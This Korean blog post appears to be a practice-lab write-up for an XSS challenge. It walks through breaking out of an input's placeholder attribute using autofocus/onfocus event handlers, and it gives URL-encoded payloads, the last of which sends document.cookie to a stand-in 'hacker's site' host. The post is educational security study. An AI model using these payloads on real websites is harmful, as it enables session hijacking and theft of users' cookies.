1

XSS 3번 문제 취약점 정리

XSS 3번 문제 취약점 정리

노아의 블로그

    목차
반응형

이번 문제 같은 경우에는 사용자 입력값이 스크립트 태그 안에 들어가나, htmlspecialchars로 인해 이스케이프 된 상태다.

하지만 mypage에 잘 보면 id 파라미터가 있다.

 

id 파라미터를 조작하면 

그 파라미터로 id란이 변경되는 모습을 볼 수 있다.

 

소스코드를 보면, placeholder에 들어간다.

 

' " >을 넣어도 문제 없이 잘 된다.

 

취약점 발견완료. 이제 공격을 시도한다.

 

user=hello"%20onclick%20="%20alert(%27ss%27);

를 입력해서 테스트 한다.

 

이벤트 핸들러도 정상적으로 작동한다. 이제 자동으로 스크립트를 실행 할 방법을 찾아야한다.

 

user=hello%22%20autofocus%20onfocus%20=%22alert(%27ss%27)%22%20

 

이런식으로 autofocus를 해주고 focus가 되면 스크립트를 실행한다.

 

무한으로 실행되니 주의..

 

이제 쿠키를 탈취한다.

 

 

user=hello%22%20autofocus%20onfocus%20=%22var%20img%20=%20new%20Image();%20img.src%20=%20%27해커의사이트/%27%20%2B%20document.cookie;%20%20

 

해킹 완료.

반응형

'해킹 > XSS' 카테고리의 다른 글

XSS 2번문제 취약점 정리  (0) 2023.05.25
게시판 DOM Based XSS 공격과 취약점 고치기  (0) 2023.05.21
Dom based XSS 학습  (0) 2023.05.21